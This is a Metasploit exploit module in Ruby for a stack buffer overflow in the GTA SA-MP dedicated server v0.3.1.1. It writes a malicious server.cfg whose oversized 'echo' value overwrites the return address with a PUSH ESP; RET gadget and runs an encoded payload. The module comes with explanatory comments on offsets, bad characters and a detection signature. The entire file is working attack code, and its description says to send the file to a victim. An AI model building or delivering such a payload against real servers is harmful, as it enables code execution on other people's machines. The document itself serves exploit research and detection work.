##
# $Id: gta_samp.rb 14076 2011-10-26 22:16:26Z mc $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

# File-format exploit module for a stack-based buffer overflow in the
# GTA SA-MP dedicated server (samp-server.exe) triggered by an oversized
# value in server.cfg. The module does no network I/O itself: it only
# writes a malicious server.cfg (via Msf::Exploit::FILEFORMAT) that has to
# be delivered to, and loaded by, the vulnerable server binary.
#
# Defender notes:
# - The only listed target is v0.3.1.1 with a hard-coded, non-relocated
#   return address inside samp-server.exe, so the module is version
#   specific; later builds with a different image layout are not covered
#   here (unverified beyond the target table below).
# - The generated file is a single `echo` directive far longer than any
#   legitimate config value (5 + 379 + 4 + payload bytes on one line), which
#   is a simple signature for a config-file sanity check on the server side.
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  # Registers module metadata and the single FILENAME option.
  #
  # @param info [Hash] module info merged by update_info (framework convention)
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'GTA SA-MP server.cfg Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack-based buffer overflow in GTA SA-MP Server.
        This buffer overflow occurs when the application attempts to open a malformed
        server.cfg file. To exploit this vulnerability, an attacker must send the
        victim a server.cfg file and have them run samp-server.exe.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Silent_Dream', # Original discovery, MSF Module, template by mona.py
        ],
      'Version'        => '$Revision: 14076 $',
      'References'     =>
        [
          [ 'URL', 'http://www.exploit-db.com/exploits/17893' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          # 0x0d/0x0a are CR/LF (line terminators in a text config file);
          # 0x1a (SUB) is also excluded -- presumably because the file is
          # read in text mode, where it can act as EOF; not confirmed here.
          'BadChars' => "\x0d\x0a\x1a",
          # Room available for the encoded payload after the return address.
          'Space'    => 392,
          # x86 `add esp, 0xfffff254` (i.e. esp -= 0xdac): moves the stack
          # pointer below the payload so the decoder stub does not overwrite
          # itself while unpacking.
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff",
          'DisableNops' => true,
          'MaxSize' => 392,
        },
      'Targets'        =>
        [
          ['GTA SA-MP (samp-server) v0.3.1.1',
            {
              # Address is inside the main executable image, so this only
              # works while that image is loaded at its expected base.
              'Ret' => 0x00429faa, # PUSH ESP; RET (samp-server.exe)
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Sep 18 2011',
      'DefaultTarget'  => 0))

    register_options(
      [
        # Output file name; defaults to the name the server actually reads.
        OptString.new('FILENAME', [ false, 'The file name.', 'server.cfg'])
      ], self.class)
  end

  # Builds the malformed server.cfg and writes it with file_create.
  #
  # Layout (offsets are bytes from the start of the file):
  #   0   "echo "                      -- config directive whose value overflows
  #   5   379 random uppercase letters -- filler up to the saved return address
  #   384 target.ret, little-endian    -- overwrites EIP with PUSH ESP; RET
  #   388 payload.encoded              -- lands at ESP, reached via the RET
  #
  # @return [void] side effect only: a file is created via FILEFORMAT
  def exploit
    buffer = "echo "
    buffer << rand_text_alpha_upper(379)
    # 'V' = 32-bit unsigned little-endian, matching the x86 target.
    buffer << [target.ret].pack('V')
    buffer << payload.encoded
    file_create(buffer)
  end
end